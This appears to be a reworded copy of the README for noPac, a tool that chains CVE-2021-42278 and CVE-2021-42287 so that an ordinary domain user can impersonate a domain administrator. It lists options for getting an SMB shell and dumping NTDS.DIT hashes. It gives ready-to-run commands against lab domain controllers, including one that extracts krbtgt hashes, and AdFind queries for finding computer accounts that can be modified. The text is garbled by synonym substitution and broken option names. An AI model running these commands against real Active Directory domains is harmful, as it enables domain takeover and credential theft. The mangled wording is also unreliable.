Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from customary area consumer
Modified from sam-the-admin.
Utilization
SAM THE ADMIN CVE-2021-42278 + CVE-2021-42287 chainpositional arguments:
[domain/]username[:password]
Account used to authenticate to DC.
elective arguments:
-h, --help present this assist message and exit
--impersonate IMPERSONATE
goal username that might be impersonated (through S4U2Self) for quering the ST. Have in mind this may solely work if the id supplied on this scripts is allowed for delegation to the SPN specified
-domain-netbios NETBIOSNAME
Area NetBIOS identify. Required if the DC has a number of domains.
-target-name NEWNAME Goal pc identify, if not specified, might be random generated.
-new-pass PASSWORD Add new pc password, if not specified, might be random generated.
-old-pass PASSWORD Goal pc password, use if the password of the goal you enter with -target-name.
-ol d-hash LMHASH:NTHASH
Goal pc hashes, use if the hash of the goal you enter with -target-name.
-debug Flip DEBUG output ON
-ts Provides timestamp to each logging output
-shell Drop a shell through smbexec
-no-add Forcibly change the password of the goal pc.
-create-child Present account have permission to CreateChild.
-dump Dump Hashs through secretsdump
-use-ldap Use LDAP as an alternative of LDAPS
authentication:
-hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH
-no-pass do not ask for password (helpful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based mostly on account parameters. If legitimate credentials can't be discovered, it'll use those specified within the command line
-aesKey hex key AES key to make use of for Kerberos Authentication (128 or 256 bits)
-dc-host hostname Hostname of the area controller to make use of. If ommited, the area half (FQDN) specified within the account parameter might be used
-dc-ip ip IP of the area controller to make use of. Helpful if you cannot translate the FQDN.specified within the account parameter might be used
execute choices:
-port [destination port]
Vacation spot port to hook up with SMB Server
-mode {SERVER,SHARE} mode to make use of (default SHARE, SERVER wants root!)< br/> -share SHARE share the place the output might be grabbed from (default ADMIN$)
-shell-type {cmd,powershell}
select a command processor for the semi-interactive shell
-codec CODEC Units encoding used (codec) from the goal's output (default "GBK").
-service-name service_name
The identify of theservice used to set off the payload
dump choices:
-just-dc-user USERNAME
Extract solely NTDS.DIT information for the consumer specified. Solely obtainable for DRSUAPI strategy. Implies additionally -just-dc change
-just-dc Extract solely NTDS.DIT information (NTLM hashes and Kerberos keys)
-just-dc-ntlm Extract solely NTDS.DIT information (NTLM hashes solely)
-pwd-last-set Exhibits pwdLastSet attribute for every NTDS.DIT account. Does not apply to -outputfile information
-use r-status Show whether or not or not the consumer is disabled
-history Dump password historical past, and LSA secrets and techniques OldVal
-resumefile RESUMEFILE
resume file identify to renew NTDS.DIT session dump (solely obtainable to DRSUAPI strategy). This file will even be used to maintain updating the session's state
-use-vss Use the VSS technique insead of default DRSUAPI
-exec-method [{smbexec,wmiexec,mmcexec}]
Distant exec technique to make use of at goal (solely when utilizing -use-vss). Default: smbexec
Observe: If -host-name will not be specified, the software will mechanically get the area management hostname, please choose the hostname of the host specified by -dc-ip. If –impersonate will not be specified, the software will randomly select a doamin admin to use. Use ldaps by default, should you get ssl error, strive add -use-ldap .
GetST
Â
Auto get shell
python noPac.py cgdomain.com/sanfeng:'[email protected]' -dc-ip 10.211.55.203 -dc-host lab2012 -shell --impersonate administrator 
Â
Dump hash
python noPac.py cgdomain.com/sanfeng:'[email protected]' -dc-ip 10.211.55.203 -dc-host lab2012 --impersonate administrator -dump
python noPac.py cgdomain.com/sanfeng:'[email protected]' -dc-ip 10.211.55.203 -dc-host lab2012 --impersonate administrator -dump -just-dc-user cgdomain/krbtgt
Scanner
MAQ = 0
Technique 1
Discover the pc that may be modified by the present consumer.
AdFind.exe -sc getacls -sddlfilter ;;"[WRT PROP]";;pc;domainuser -recmute
Â
Exp: add -no-add and goal with -target-name.
python noPac.py cgdomain.com/sanfeng:'[email protected]' -dc-ip 10.211.55.200 -dc-host dc2008 --impersonate administrator -no-add -target-name DomainWin7$ -old-hash :2a99c4a3bd5d30fc94f22bf7403ceb1a -shell
 Warning!! Don’t modify the password of the pc within the area via ldaps or samr, it could break the belief relationship between the pc and the first area !!Technique 2
Discover CreateChild account, and use the account to use.
AdFind.exe -sc getacls -sddlfilter ;;"[CR CHILD]";;pc; -recmute
Exp: add -create-child
python noPac.py cgdomain.com/venus:'[email protected]' -dc-ip 10.211.55.200 -dc-host dc2008 --impersonate administrator -create-child
